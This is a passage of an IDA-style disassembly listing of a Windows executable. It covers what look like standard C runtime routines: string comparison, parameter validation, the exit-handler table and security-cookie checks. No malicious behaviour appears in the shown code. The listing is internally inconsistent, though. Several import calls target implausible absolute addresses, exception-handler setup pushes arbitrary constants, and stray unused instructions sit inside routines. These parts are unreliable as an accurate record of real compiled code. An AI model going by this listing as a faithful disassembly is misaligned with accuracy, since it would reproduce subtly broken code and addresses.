and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 312206h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
int 3 ; Trap to Debugger
sub_40267A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4026B9 proc near ; CODE XREF: sub_401141+13�p
; sub_4012AC+F�p
push 44h
mov eax, offset dword_42C488
call sub_4045CC
push 216244h
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push 50B122h
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D338
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D338
mov eax, esi
pop esi
retn 4
sub_4026B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_401C1D+9A�p
; sub_401CC0+1B7�p ...
cmp ecx, ds:dword_423064
jnz short loc_40271A
rep retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_402710+6�j
jmp sub_40468E
sub_402710 endp
; =============== S U B R O U T I N E =======================================
sub_40271F proc near ; CODE XREF: sub_4027D6+D�p
; sub_4028F9+1A�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_402791
call sub_40539D
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, ds:off_423678
jz short loc_40275D
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40275D
call sub_4050B1
mov [esi], eax
loc_40275D: ; CODE XREF: sub_40271F+2A�j
; sub_40271F+35�j
mov eax, [esi+4]
cmp eax, ds:off_423498
jz short loc_40277E
mov eax, [esi+8]
mov ecx, ds:dword_423594
test [eax+70h], ecx
jnz short loc_40277E
call sub_4049A0
mov [esi+4], eax
loc_40277E: ; CODE XREF: sub_40271F+47�j
; sub_40271F+55�j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_40279B
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_40279B
; ---------------------------------------------------------------------------
loc_402791: ; CODE XREF: sub_40271F+D�j
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_40279B: ; CODE XREF: sub_40271F+66�j
; sub_40271F+70�j
mov eax, esi
pop esi
retn 4
sub_40271F endp
; =============== S U B R O U T I N E =======================================
sub_4027A1 proc near ; CODE XREF: sub_4027D6+86�p
; sub_4028A9+39�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_4027AB: ; CODE XREF: sub_4027A1+2E�j
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_4027BA
add eax, 20h
loc_4027BA: ; CODE XREF: sub_4027A1+14�j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_4027C9
add ecx, 20h
loc_4027C9: ; CODE XREF: sub_4027A1+23�j
test eax, eax
jz short loc_4027D1
cmp eax, ecx
jz short loc_4027AB
loc_4027D1: ; CODE XREF: sub_4027A1+2A�j
pop edi
sub eax, ecx
pop esi
retn
sub_4027A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027D6 proc near ; CODE XREF: sub_4028A9+45�p
; sub_40E79A+8F�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_40271F
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_40281D
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402813
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402813: ; CODE XREF: sub_4027D6+34�j
mov eax, 7FFFFFFFh
jmp loc_4028A6
; ---------------------------------------------------------------------------
loc_40281D: ; CODE XREF: sub_4027D6+17�j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_402850
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402849
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402849: ; CODE XREF: sub_4027D6+6A�j
mov eax, 7FFFFFFFh
jmp short loc_4028A5
; ---------------------------------------------------------------------------
loc_402850: ; CODE XREF: sub_4027D6+4D�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402865
push edi
push [ebp+arg_0]
call sub_4027A1
pop ecx
pop ecx
jmp short loc_402899
; ---------------------------------------------------------------------------
loc_402865: ; CODE XREF: sub_4027D6+80�j
push esi
loc_402866: ; CODE XREF: sub_4027D6+BC�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_402894
cmp esi, eax
jz short loc_402866
loc_402894: ; CODE XREF: sub_4027D6+B8�j
sub esi, eax
mov eax, esi
pop esi
loc_402899: ; CODE XREF: sub_4027D6+8D�j
cmp [ebp+var_4], bl
jz short loc_4028A5
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_4028A5: ; CODE XREF: sub_4027D6+78�j
; sub_4027D6+C6�j
pop edi
loc_4028A6: ; CODE XREF: sub_4027D6+42�j
pop ebx
leave
retn
sub_4027D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A9 proc near ; CODE XREF: sub_417676+34�p
; sub_417676+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_4028E7
cmp [ebp+arg_0], esi
jnz short loc_4028DB
loc_4028BC: ; CODE XREF: sub_4028A9+35�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_4028F6
; ---------------------------------------------------------------------------
loc_4028DB: ; CODE XREF: sub_4028A9+11�j
cmp [ebp+arg_4], esi
jz short loc_4028BC
pop esi
pop ebp
jmp sub_4027A1
; ---------------------------------------------------------------------------
loc_4028E7: ; CODE XREF: sub_4028A9+C�j
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4027D6
add esp, 0Ch
loc_4028F6: ; CODE XREF: sub_4028A9+30�j
pop esi
pop ebp
retn
sub_4028A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028F9 proc near ; CODE XREF: sub_4029E9+51�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
jz loc_4029E2
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_40271F
cmp [ebp+arg_0], ebx
jnz short loc_40294B
loc_40291D: ; CODE XREF: sub_4028F9+57�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402941
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402941: ; CODE XREF: sub_4028F9+3F�j
mov eax, 7FFFFFFFh
jmp loc_4029E4
; ---------------------------------------------------------------------------
loc_40294B: ; CODE XREF: sub_4028F9+22�j
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_40291D
mov esi, 7FFFFFFFh
cmp [ebp+arg_8], esi
jbe short loc_402984
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402980
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402980: ; CODE XREF: sub_4028F9+7E�j
mov eax, esi
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_402984: ; CODE XREF: sub_4028F9+61�j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_4029A9
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_405820
add esp, 0Ch
loc_40299B: ; CODE XREF: sub_4028F9+E7�j
cmp [ebp+var_4], bl
jz short loc_4029E4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4029E4
; ---------------------------------------------------------------------------
loc_4029A9: ; CODE XREF: sub_4028F9+91�j
; sub_4028F9+E1�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_40565A
add esp, 10h
inc edi
dec [ebp+arg_8]
jz short loc_4029DC
cmp esi, ebx
jz short loc_4029DC
cmp esi, eax
jz short loc_4029A9
loc_4029DC: ; CODE XREF: sub_4028F9+D9�j
; sub_4028F9+DD�j
sub esi, eax
mov eax, esi
jmp short loc_40299B
; ---------------------------------------------------------------------------
loc_4029E2: ; CODE XREF: sub_4028F9+E�j
xor eax, eax
loc_4029E4: ; CODE XREF: sub_4028F9+4D�j
; sub_4028F9+89�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4028F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029E9 proc near ; CODE XREF: sub_419A9F+D3�p
; sub_419C6D+176�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp ds:dword_425DE0, esi
jnz short loc_402A30
cmp [ebp+arg_0], esi
jnz short loc_402A1B
loc_4029FC: ; CODE XREF: sub_4029E9+35�j
; sub_4029E9+3E�j
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402A42
; ---------------------------------------------------------------------------
loc_402A1B: ; CODE XREF: sub_4029E9+11�j
cmp [ebp+arg_4], esi
jz short loc_4029FC
cmp [ebp+arg_8], 7FFFFFFFh
ja short loc_4029FC
pop esi
pop ebp
jmp sub_405820
; ---------------------------------------------------------------------------
loc_402A30: ; CODE XREF: sub_4029E9+C�j
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4028F9
add esp, 10h
loc_402A42: ; CODE XREF: sub_4029E9+30�j
pop esi
pop ebp
retn
sub_4029E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A45 proc near ; CODE XREF: sub_402D09+36�p
; sub_416F86+4C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push 285891h
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_402A7E
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402A7E: ; CODE XREF: sub_402A45+1A�j
cmp ds:dword_434DF4, 3
jnz short loc_402ABF
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_402AAB
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_402AAE
; ---------------------------------------------------------------------------
loc_402AAB: ; CODE XREF: sub_402A45+59�j
mov esi, [ebp+var_1C]
loc_402AAE: ; CODE XREF: sub_402A45+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402ADF
cmp [ebp+var_20], edi
jnz short loc_402ACF
loc_402ABF: ; CODE XREF: sub_402A45+40�j
push ebx
push edi
push ds:dword_425F68
call dword ptr ds:542C48h
mov esi, eax
loc_402ACF: ; CODE XREF: sub_402A45+78�j
mov eax, esi
loc_402AD1: ; CODE XREF: sub_402A45+37�j
call __SEH_epilog4
retn
sub_402A45 endp
; =============== S U B R O U T I N E =======================================
sub_402AD7 proc near ; DATA XREF: seg001:00421320�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_402AD7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402ADF proc near ; CODE XREF: sub_402A45+70�p
push 4
call sub_40591F
pop ecx
retn
sub_402ADF endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE8 proc near ; CODE XREF: sub_419EA0+54�p
jmp dword ptr ds:2A1624h
sub_402AE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEE proc near ; CODE XREF: sub_40177B+FE�p
; sub_40177B+12F�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_402B19
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B98
; ---------------------------------------------------------------------------
loc_402B19: ; CODE XREF: sub_402AEE+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_402B45
cmp esi, ebx
jnz short loc_402B45
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402B97
; ---------------------------------------------------------------------------
loc_402B45: ; CODE XREF: sub_402AEE+34�j
; sub_402AEE+38�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_402B54
mov [ebp+var_1C], ecx
loc_402B54: ; CODE XREF: sub_402AEE+61�j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_402B96
dec [ebp+var_1C]
js short loc_402B88
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_402B94
; ---------------------------------------------------------------------------
loc_402B88: ; CODE XREF: sub_402AEE+91�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_402B94: ; CODE XREF: sub_402AEE+98�j
mov eax, edi
loc_402B96: ; CODE XREF: sub_402AEE+8C�j
pop edi
loc_402B97: ; CODE XREF: sub_402AEE+55�j
pop esi
loc_402B98: ; CODE XREF: sub_402AEE+29�j
pop ebx
leave
retn
sub_402AEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402B9B proc near ; CODE XREF: sub_416F86+15F�p
; sub_416F86+167�p ...
jmp sub_402F6D
sub_402B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA0 proc near ; CODE XREF: sub_40101C+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402BF5
cmp [ebp+arg_0], edi
jnz short loc_402BCE
loc_402BB3: ; CODE XREF: sub_402BA0+31�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402BBD: ; CODE XREF: sub_402BA0+44�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402BF7
; ---------------------------------------------------------------------------
loc_402BCE: ; CODE XREF: sub_402BA0+11�j
cmp [ebp+arg_8], edi
jz short loc_402BB3
cmp [ebp+arg_4], eax
jnb short loc_402BE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402BBD
; ---------------------------------------------------------------------------
loc_402BE6: ; CODE XREF: sub_402BA0+36�j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407370
add esp, 0Ch
loc_402BF5: ; CODE XREF: sub_402BA0+C�j
xor eax, eax
loc_402BF7: ; CODE XREF: sub_402BA0+2C�j
pop edi
pop esi
pop ebp
retn
sub_402BA0 endp
; =============== S U B R O U T I N E =======================================
sub_402BFB proc near ; CODE XREF: sub_401065+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D36C
retn
sub_402BFB endp
; =============== S U B R O U T I N E =======================================
sub_402C0C proc near ; CODE XREF: sub_4015ED+2F�p
; sub_40BA07+15D�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_41D36C
mov eax, [ebx]
test eax, eax
jz short loc_402C47
push eax
call sub_404130
mov esi, eax
inc esi
push esi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_402C4B
push dword ptr [ebx]
push esi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402C4B
; ---------------------------------------------------------------------------
loc_402C47: ; CODE XREF: sub_402C0C+13�j
and dword ptr [edi+4], 0
loc_402C4B: ; CODE XREF: sub_402C0C+2B�j
; sub_402C0C+39�j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402C0C endp
; =============== S U B R O U T I N E =======================================
sub_402C5A proc near ; CODE XREF: sub_403032+A�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_41D36C
mov ecx, [ecx]
and dword ptr [eax+8], 0
mov [eax+4], ecx
retn 8
sub_402C5A endp
; =============== S U B R O U T I N E =======================================
sub_402C72 proc near ; CODE XREF: sub_4013E6+15�p
; sub_4015ED+51�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D36C
mov eax, [ebx+8]
mov [esi+8], eax
test eax, eax
mov eax, [ebx+4]
push edi
jz short loc_402CBF
test eax, eax
jz short loc_402CB9
push eax
call sub_404130
mov edi, eax
inc edi
push edi
call sub_4036E0
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_402CC2
push dword ptr [ebx+4]
push edi
push eax
call sub_4076D5
add esp, 0Ch
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CB9: ; CODE XREF: sub_402C72+1E�j
and dword ptr [esi+4], 0
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CBF: ; CODE XREF: sub_402C72+1A�j
mov [esi+4], eax
loc_402CC2: ; CODE XREF: sub_402C72+36�j
; sub_402C72+45�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_402C72 endp
; =============== S U B R O U T I N E =======================================
sub_402CCA proc near ; CODE XREF: sub_401038+6�j
; seg000:0040104C�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D36C
jz short locret_402CDF
push dword ptr [ecx+4]
call sub_403603
pop ecx
locret_402CDF: ; CODE XREF: sub_402CCA+A�j
retn
sub_402CCA endp
; =============== S U B R O U T I N E =======================================
sub_402CE0 proc near ; DATA XREF: seg001:0041D318�o
; seg001:0041D370�o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_402CEC
mov edx, 0C950B1h
locret_402CEC: ; CODE XREF: sub_402CE0+5�j
retn
sub_402CE0 endp
; ---------------------------------------------------------------------------
loc_402CED: ; DATA XREF: seg001:off_41D36C�o
push esi
mov esi, ecx
call sub_402CCA
test byte ptr [esp+8], 1
jz short loc_402D03
push esi
call sub_402F6D
pop ecx
loc_402D03: ; CODE XREF: seg000:00402CFA�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_402D09 proc near ; CODE XREF: sub_402DE5+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push ds:dword_434DD0
call sub_405193
push ds:dword_434DCC
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_405193
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb short loc_402DAE
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_402DAE
push esi
call sub_402A45
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_402D95
mov edx, 0CDB2A1h
cmp esi, eax
jnb short loc_402D56
mov eax, esi
loc_402D56: ; CODE XREF: sub_402D09+49�j
add eax, esi
cmp eax, esi
jb short loc_402D6C
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jnz short loc_402D83
loc_402D6C: ; CODE XREF: sub_402D09+51�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_402DAE
push eax
push [esp+18h+var_4]
call sub_4077C2
test eax, eax
pop ecx
pop ecx
jz short loc_402DAE
loc_402D83: ; CODE XREF: sub_402D09+61�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_405127
pop ecx
mov ds:dword_434DD0, eax
loc_402D95: ; CODE XREF: sub_402D09+40�j
mov esi, [esp+14h+arg_0]
mov [edi], esi
add edi, 4
push edi
call sub_405127
mov ds:dword_434DCC, eax
pop ecx
mov eax, esi
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402DAE: ; CODE XREF: sub_402D09+27�j
; sub_402D09+33�j ...
xor eax, eax
loc_402DB0: ; CODE XREF: sub_402D09+A3�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_402D09 endp
; =============== S U B R O U T I N E =======================================
sub_402DB6 proc near ; DATA XREF: seg001:0041D2C0�o
push esi
push 4
push 20h
call sub_40777A
mov esi, eax
push esi
call sub_405127
add esp, 0Ch
test esi, esi
mov ds:dword_434DD0, eax
mov ds:dword_434DCC, eax
jnz short loc_402DDE
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402DDE: ; CODE XREF: sub_402DB6+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_402DB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DE5 proc near ; CODE XREF: sub_402E21+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push 6ED950h
call __SEH_prolog4
call sub_4078BC
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_402D09
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402E1B
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_402DE5 endp
; =============== S U B R O U T I N E =======================================
sub_402E1B proc near ; CODE XREF: sub_402DE5+28�p
; DATA XREF: seg001:00421340�o
call sub_4078C5
retn
sub_402E1B endp
; =============== S U B R O U T I N E =======================================
sub_402E21 proc near ; CODE XREF: sub_40304B+45�p
; sub_407979+44�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402DE5
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_402E21 endp
; =============== S U B R O U T I N E =======================================
sub_402E33 proc near ; CODE XREF: sub_407B19+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_425A80, eax
retn
sub_402E33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2A8h
sub_402E3D proc near ; CODE XREF: sub_402F39+1F�j
; sub_405A28+21�p ...
var_328 = dword ptr -328h
var_31C = dword ptr -31Ch
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_244 = word ptr -244h
var_240 = word ptr -240h
var_23C = word ptr -23Ch
var_238 = word ptr -238h
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = word ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = word ptr -208h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2A8h]
sub esp, 328h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2A8h+var_4], eax
push esi
mov [ebp+2A8h+var_220], eax
mov [ebp+2A8h+var_224], ecx
mov [ebp+2A8h+var_228], edx
mov [ebp+2A8h+var_22C], ebx
mov [ebp+2A8h+var_230], esi
mov [ebp+2A8h+var_234], edi
mov [ebp+2A8h+var_208], ss
mov [ebp+2A8h+var_214], cs
mov [ebp+2A8h+var_238], ds
mov [ebp+2A8h+var_23C], es
mov [ebp+2A8h+var_240], fs
mov [ebp+2A8h+var_244], gs
pushf
pop [ebp+2A8h+var_210]
mov esi, [ebp+2ACh]
lea eax, [ebp+2ACh]
mov [ebp+2A8h+var_20C], eax
mov [ebp+2A8h+var_2D0], 10001h
mov [ebp+2A8h+var_218], esi
mov eax, [eax-4]
push 50h
mov [ebp+2A8h+var_21C], eax
lea eax, [ebp+2A8h+var_328]
push 0
push eax
call sub_407B70
lea eax, [ebp+2A8h+var_328]
mov [ebp+2A8h+var_2D8], eax
lea eax, [ebp+2A8h+var_2D0]
add esp, 0Ch
mov [ebp+2A8h+var_328], 0C000000Dh
mov [ebp+2A8h+var_31C], esi
mov [ebp+2A8h+var_2D4], eax
call dword ptr ds:776CA8h
push 0
mov esi, eax
call dword ptr ds:7BB654h
lea eax, [ebp+2A8h+var_2D8]
push eax
call dword ptr ds:7DDB2Ah
test eax, eax
jnz short loc_402F11
test esi, esi
jnz short loc_402F11
push 2
call sub_407B65
pop ecx
loc_402F11: ; CODE XREF: sub_402E3D+C6�j
; sub_402E3D+CA�j
push 0C000000Dh
call dword ptr ds:7EED95h
push eax
call dword ptr ds:7F76CAh
mov ecx, [ebp+2A8h+var_4]
xor ecx, ebp
pop esi
call sub_402710
add ebp, 2A8h
leave
retn
sub_402E3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F39 proc near ; CODE XREF: sub_4027D6+29�p
; sub_4027D6+5F�p ...
push ebp
mov ebp, esp
push ds:dword_425A80
call sub_405193
test eax, eax
pop ecx
jz short loc_402F4F
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_402F4F: ; CODE XREF: sub_402F39+11�j
push 2
call sub_407B65
pop ecx
pop ebp
jmp sub_402E3D
sub_402F39 endp
; =============== S U B R O U T I N E =======================================
sub_402F5D proc near ; CODE XREF: sub_40164F+5�p
; sub_40164F+14�p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
retn
sub_402F5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F6D proc near ; CODE XREF: seg000:00401059�p
; seg000:004010D5�p ...
jmp sub_403603
sub_402F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F72 proc near ; CODE XREF: sub_401000+F�p
; sub_403B22+84�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_402F84
loc_402F80: ; CODE XREF: sub_402F72+4B�j
xor eax, eax
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402F84: ; CODE XREF: sub_402F72+C�j
cmp [ebp+arg_0], edi
jnz short loc_402FA4
loc_402F89: ; CODE XREF: sub_402F72+5F�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402F93: ; CODE XREF: sub_402F72+72�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402F72+15�j
cmp [ebp+arg_8], edi
jz short loc_402FBF
cmp [ebp+arg_4], esi
jb short loc_402FBF
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407BF0
add esp, 0Ch
jmp short loc_402F80
; ---------------------------------------------------------------------------
loc_402FBF: ; CODE XREF: sub_402F72+35�j
; sub_402F72+3A�j
push [ebp+arg_4]
push edi
